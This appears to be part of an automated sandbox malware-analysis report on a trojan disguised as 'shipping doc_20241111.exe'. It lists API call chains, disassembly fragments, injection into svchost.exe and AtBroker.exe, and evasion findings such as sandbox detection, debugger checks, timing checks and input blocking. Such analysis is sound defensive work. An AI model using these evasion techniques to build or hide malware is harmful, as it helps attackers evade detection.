Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028A17B7 push 6B6FB766h; ret	2_2_028A17BC
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028B5F0C push eax; retf	2_2_028B5F82
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028A1712 pushad ; ret	2_2_028A1713
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028AE748 push ecx; ret	2_2_028AE794
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	Code function: 2_2_028BB59E push ebx; ret	2_2_028BB5A4
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046227FA pushad ; ret	3_2_046227F9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0462225F pushad ; ret	3_2_046227F9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_0462283D push eax; iretd	3_2_04622858
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_046509AD push ecx; mov dword ptr [esp], ecx	3_2_046509B6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_04621328 push eax; iretd	3_2_04621369
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004BE020 push cs; ret	3_2_004BE043

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F5EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,		0_2_00F5EFAD
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FD1B74 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00FD1B74

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-90462

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	API/Special instruction interceptor: Address: 15AB59C
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\AtBroker.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0317096E rdtsc

1_2_0317096E

Source: C:\Windows\SysWOW64\AtBroker.exe	Window / User API: threadDelayed 3943			Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Window / User API: threadDelayed 6030			Jump to behavior

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	API coverage: 3.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\AtBroker.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\AtBroker.exe TID: 3592	Thread sleep count: 3943 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 3592	Thread sleep time: -7886000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 3592	Thread sleep count: 6030 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 3592	Thread sleep time: -12060000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe TID: 3612	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe TID: 3612	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe TID: 3612	Thread sleep time: -66000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe TID: 3612	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe TID: 3612	Thread sleep time: -45000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00FB68AD
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB680C FindFirstFileW,FindClose,	0_2_00FB680C
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FACF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FACF94
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FAD2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FAD2C7
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FB9560
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FB96BB
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FADADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FADADC
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00FB9A49
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB5BB5 FindFirstFileW,FindNextFileW,FindClose,	0_2_00FB5BB5
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004BC830 FindFirstFileW,FindNextFileW,FindClose,	3_2_004BC830

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F4615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F4615E

Source: DvhYoKnukykMD.exe, 00000005.00000002.4108691312.000000000139F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: AtBroker.exe, 00000003.00000002.4108398193.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2073293426.0000029CD8DFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0317096E rdtsc

1_2_0317096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_02557B23 LdrLoadDll,

1_2_02557B23

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FBE9C9 BlockInput,

0_2_00FBE9C9

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F4445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F4445D

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00F4615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F4615E

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F64C78 mov eax, dword ptr fs:[00000030h]	0_2_00F64C78
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_015AA1B8 mov eax, dword ptr fs:[00000030h]	0_2_015AA1B8
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_015AB868 mov eax, dword ptr fs:[00000030h]	0_2_015AB868
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_015AB808 mov eax, dword ptr fs:[00000030h]	0_2_015AB808
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h]	1_2_0312C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov ecx, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h]	1_2_03150310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]	1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]	1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]	1_2_0316A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]	1_2_031B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h]	1_2_031FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D8350 mov ecx, dword ptr fs:[00000030h]	1_2_031D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]	1_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D437C mov eax, dword ptr fs:[00000030h]	1_2_031D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320634F mov eax, dword ptr fs:[00000030h]	1_2_0320634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]	1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]	1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]	1_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]	1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]	1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]	1_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]	1_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]	1_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]	1_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]	1_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]	1_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h]	1_2_031EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]	1_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h]	1_2_031B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031663FF mov eax, dword ptr fs:[00000030h]	1_2_031663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]	1_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312823B mov eax, dword ptr fs:[00000030h]	1_2_0312823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h]	1_2_0312A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136259 mov eax, dword ptr fs:[00000030h]	1_2_03136259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]	1_2_031EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]	1_2_031EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h]	1_2_031B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h]	1_2_031B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]	1_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]	1_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]	1_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]	1_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312826B mov eax, dword ptr fs:[00000030h]	1_2_0312826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320625D mov eax, dword ptr fs:[00000030h]	1_2_0320625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]	1_2_0316E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]	1_2_0316E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]	1_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]	1_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]	1_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]	1_2_031402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]	1_2_031402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]	1_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]	1_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]	1_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]	1_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032062D6 mov eax, dword ptr fs:[00000030h]	1_2_032062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov ecx, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]	1_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F0115 mov eax, dword ptr fs:[00000030h]	1_2_031F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]	1_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160124 mov eax, dword ptr fs:[00000030h]	1_2_03160124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C156 mov eax, dword ptr fs:[00000030h]	1_2_0312C156
